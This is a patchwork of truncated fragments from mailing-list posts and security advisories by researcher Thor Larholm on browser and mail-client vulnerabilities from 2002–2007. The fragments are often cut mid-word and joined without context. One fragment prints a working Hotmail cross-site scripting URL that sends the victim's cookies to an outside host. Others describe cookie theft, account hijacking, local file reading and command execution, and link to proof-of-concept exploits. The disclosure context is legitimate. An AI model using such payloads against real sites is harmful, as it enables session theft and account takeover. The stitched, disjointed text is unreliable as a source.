upgrade to Thunderbird 2.0.
http://larholm.com/2007/07/26/thunderbird-15-has-not-been-patched-with-osint/
Regards
Thor Larholm
Thor Larholm wrote:
The Mozilla application platform currently has an unpatched input
validation flaw which allows you to specify arbitrary command line
arguments to any regi
A ZIP file with the report and the XPI exploits can be found at
http://larholm.com/media/2007/7/mozillaprotocolabuse.zip
Cheers
Thor Larholm
handler. The
full advisory and a working Proof of Concept exploit can be found at
http://larholm.com/2007/07/10/internet-explorer-0day-exploit/
Cheers
Thor Larholm
interaction simply by visiting a webpage. The full advisory and a
working Proof of Concept exploit can be found at
http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/
Cheers
Thor Larholm
--
I call dibs on the first SafariWin bug
-execution/
Cheers
Thor Larholm
is that you can still read some local files on Windows
and all user accessible files on Linux/Unix/OS X, with all user
accessible files potentially readable as well on Windows through the
patch regression.
http://larholm.com/2007/06/04/unpatched-input-validation-flaw-in-firefox-2004/
Cheers
Thor
ot;.
The updated version of Firebug should also prevent any closely related
vulnerabilities as Joe has updated his domplate constructors to
forcefully escape all strings before they are inserted into the
console HTML.
Cheers
Thor Larholm
On 4/4/07, pdp (architect) <[EMAIL PROTECTED]> wr
blogs.securiteam.com/index.php/archives/657
--
Thor Larholm
and thus
allows you to overwrite native DOM methods on a third-party domain,
broadening the potential attack scope by allowing you to interfere with
the operations of existing script code inside that third-party document.
--
Thor Larholm
PolyPath, CSO
which covers the broader picture. I
guess the cat is out of the bag now, might as well release that soon ;)
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
-Original Message-
From: Richard M. Smith [mailto:[EMAIL PROTECTED]
Sent: Monday, August 04, 2003 11:58
crashing svchost. Of course,
this is only with the new return addresses that are not tied to any
specific service pack.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
-Original Message-
From: khan rohail [mailto:[EMAIL PROTECTED]
Sent: Monday, July 28, 2003 8:34 AM
, both on a
webpage and in an email - even with scripting disabled in the Restricted
Zone, which has so far been a major mitigating factor. This means that an
email-borne exploit would execute immediately when a user opened or previewed
an HTML-based email.
Regards
Thor Larholm
PivX Solutions, LLC
Thor Larholm security advisory TL#006
-
16 July 2003
HTML format: http://pivx.com/larholm/adv/TL006
Topic: ISA Server HTTP error handler XSS.
Discovery date: 25 June 2002.
Severity: Medium
Affected applications:
--
Any Microsoft
e web in the Internet Zone, so this is remotely exploitable on websites.
Since MHT files are opened automatically, just like certain other media
files, you can also open an MHT file automatically through an email message
in the Restricted Zone.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Internet Zone for viewing HTML mail? If so, it is
also still vulnerable to the codeBase command execution vulnerability, like
any other application that is embedding MSHTML.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-Vendor Unreal Engine
Since RTF files are opened and rendered automatically by Outlook Express and
Internet Explorer, this is remotely exploitable through mail and web.
I had some problems reproducing this on Windows 2000, anyone had better
luck?
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
dor
that at best is plainly ignorant and at worst acts directly against the best
interest and security of its own customers.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-Vendor Unreal Engine Advisory
http://www.pivx.com/press_releases/ueng-adv_pr.html
bed it their own and wrote up a fancy press release filled with
inaccuracies announcing an indifferent 'whitepaper' scattered with obscure
irrelevancies.
In short, snakeoil.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-vendor Game
urrently 18 unpatched publicly known vulnerabilities in Internet
Explorer, of which I have labelled 6 as severe.
http://www.pivx.com/larholm/unpatched/
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Strike Now, StrikeFirst!
http://www.pivx.com/sf.html
This is just a copy of Andreas Sandblad's advisory, with a new command :)
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Strike Now, StrikeFirst!
http://www.pivx.com/sf.html
-Original Message-
From: Alan Rouse [mailto:[EMAIL PROTECTED]]
Sent: 11. november 2002 17:22
To
Monitoring which pages a user visits is also possible, and in general there
seem to be some oversights in this otherwise smooth rewrite.
Add to that some of the more odd bugs functionality-wise, and I would say
there is room for a beta 2 ;)
Regards
Thor Larholm, Security Researcher
PivX
comes up with next to prevent interaction
between security zones.
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com
-Original Message-
From: Andreas Sandblad [mailto:sandblad@;acc.umu.se]
Sent: 6. november 2002 20:48
To: [EMAIL PROTECTED
each individual method and object. At first, I assumed
they had made a generic fix, but with this in the open it is clear that they
only patched specifics and that there will be many more vulnerabilities in
the method/object caching category.
Regards
Thor Larholm
This is not a vulnerability or even privacy exposure in MSN, but just a
demonstration of zone spoofing by using the %2F encoding bug.
All the exposed MSN contact list and information is intentionally, and
safely, exposed in the My Computer zone.
Regards
Thor Larholm, Security Researcher
PivX
Thor Larholm security advisory TL#004
Topic: Windows Help buffer overflow
HTML version:
http://www.pivx.com/larholm/adv/TL004/
Discovery date: 31 July 2002
Release date: 4 October 2002
Affected applications
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows
/ alerts "hi monkeyboy"
The first argument can be both a string or a regular expression.
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>location.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.replace('$',document.cookie));&ct=1033054530&_setlang=",,-1,0
Regards
Thor Larholm
Jubii A/S - Internet Programmer
bitrary scripting to be executed by the
user in the context of hotmail. This means that you can e.g. steal his
cookies or, if he's logged in, write emails from his account, delete his
mails and change his password.
Regards
Thor Larholm
Jubii A/S - Internet Programmer
This also works in IE5.5.
Besides reading cookies from arbitrary sites, this vulnerability also allows
local file reading and execution - when combined with the OBJECT
cross-protocol redirection vulnerability.
http://jscript.dk/2002/10/sec/SaveRefLocalFile.html
Regards
Thor Larholm
rity issues that were fixed between
the minor version change 1.0 to 1.0.1, I have no idea about the amount of
issues that remain or that have been fixed so far.
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com
> From: Nick FitzGerald [mailto:[EMAIL PROTECTED]]
> Hi Thor,
> Doesn't the following have similar implications to the issue in your
> TL#002 advisory??
Hi Nick,
close but no cigar - yet. In its current state, this % encoding issue cannot
escape protocol boundaries, which means that it cannot g
ed when used again - in which case you are out of
luck.
If your vulnerability did not deal with OWC, then excuse my intrusion and
let me guess on a Content-Type/Content-Disposition variant - though your
suggested workaround would make no sense then :)
Regards
Thor Larholm, Security Researcher
P
or has explicitly allowed HTTP traffic on
(most often) port 80.
Out of plain curiosity, how is this fixed in IE6SP1 - as the Netscape team
fixed it by demanding both sites to set document.domain, regardless of whether
one is the parent?
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com
> Title: Pressing CTRL in IE is dangerous
Of course, this also works with key combinations such as Shift+Ins, just
change event.ctrlKey to event.shiftKey and 86 to 45 :)
20 and counting ...
http://www.pivx.com/larholm/unpatched/
Regards
Thor Larholm, Security Researcher
PivX Soluti
Thor Larholm, PivX, security advisory TL#003
-
By Thor Larholm, Denmark
10 July 2002
HTML format: http://www.PivX.com/larholm/adv/TL003/
Topic: IE allows universal Cross Domain Scripting.
Discovery date: 25 June 2002.
Severity: High
Affected applications
it quite
easy to e.g. execute arbitrary commands, undoubtedly a more fun
demonstration:
http://jscript.dk/Jumper/xploit/ftpfolderview.html
Status: 18 unpatched vulnerabilities.
http://jscript.dk/Unpatched/
Regards
Thor Larholm
Jubii A/S - Internet Programmer
to be the only one who has discovered this fact. GreyMagic
Software have updated their advisory on the cssText vulnerability and
bundled a new example that works "post MS02-023", which can be found at
http://sec.greymagic.com/adv/gm004-ie/
Regards
Thor Larholm
Jubii A/S - Internet Programmer
inute since the email itself would act as the hosting server.
Yesterday I hosted a list of 14 publicly known unpatched vulnerabilities,
today I host a list of 12 such. It can still be found at
http://jscript.dk/unpatched/
Just my .02 kroner of comments :)
Regards
Thor Larholm
Jubii A/S - Internet Programmer
f-concept demonstration that also works in moz1rc1 can be found at
http://jscript.dk/2002/4/NS6Tests/documentload.html
Regards
Thor Larholm
Jubii A/S - Internet Programmer
files exist.
http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp
Regards
Thor Larholm
Jubii A/S - Internet Programmer
-Original Message-
From: GreyMagic Software [mailto:[EMAIL PROTECTED]]
Sent: 30. april 2002 03:11
To: NTBugtraq; Bugtraq
Subject: Reading local files in Netscape
Thor Larholm security advisory TL#002
-
By Thor Larholm, Denmark.
16 April 2002
HTML Format: http://jscript.dk/adv/TL002/
Topic: IE allows universal Cross Site Scripting.
Discovery date: 18 March 2002.
Severity: High
Affected applications
Thor Larholm security advisory TL#001
-
By Thor Larholm, Denmark.
10 April 2002
HTML format: http://jscript.dk/adv/TL001/
Topic: IIS allows universal CrossSiteScripting.
Discovery date: 13 March 2002.
Severity: Medium
Affected applications
Further, the patch doesn't seem to work completely:
http://www.theregister.co.uk/content/4/24667.html
Though, in other cases, it works better than expected:
http://jscript.dk/unpatched/N280302-01.html
A revision of the patch may be in place.
Regards
Thor Larholm
Jubii A/S - Int
ered to be a code quality bug, and will be addressed in a future SP
for IE.
--
Thor Larholm